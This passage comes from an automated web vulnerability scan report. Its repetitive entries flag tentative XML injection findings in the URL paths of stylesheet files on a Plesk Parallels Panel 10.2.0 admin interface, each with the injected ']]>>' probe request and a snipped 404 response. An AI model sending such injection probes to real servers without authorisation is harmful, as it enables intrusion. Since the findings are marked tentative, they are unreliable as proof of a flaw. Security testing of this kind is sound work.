Path:   /skins/default/css/common/ie.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/common/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.83. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/ie.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/common/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.84. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/ie.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common]]>>/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.85. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/ie.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common/ie.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.86. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/content-only.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/customer/content-only.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.87. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/content-only.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/customer/content-only.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.88. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/content-only.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/customer/content-only.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.89. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/content-only.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer]]>>/content-only.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.90. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/content-only.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer/content-only.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.91. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/custom.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.92. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/custom.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:34 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.93. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/custom.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/customer/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:41 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.94. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/custom.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer]]>>/custom.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.95. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/custom.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer/custom.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:54 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.96. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/main.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.97. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/main.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:34 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.98. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/main.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/customer/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:41 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.99. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/main.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer]]>>/main.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.100. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/customer/main.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/customer/main.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:54 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.101. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/general.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/general.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.102. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
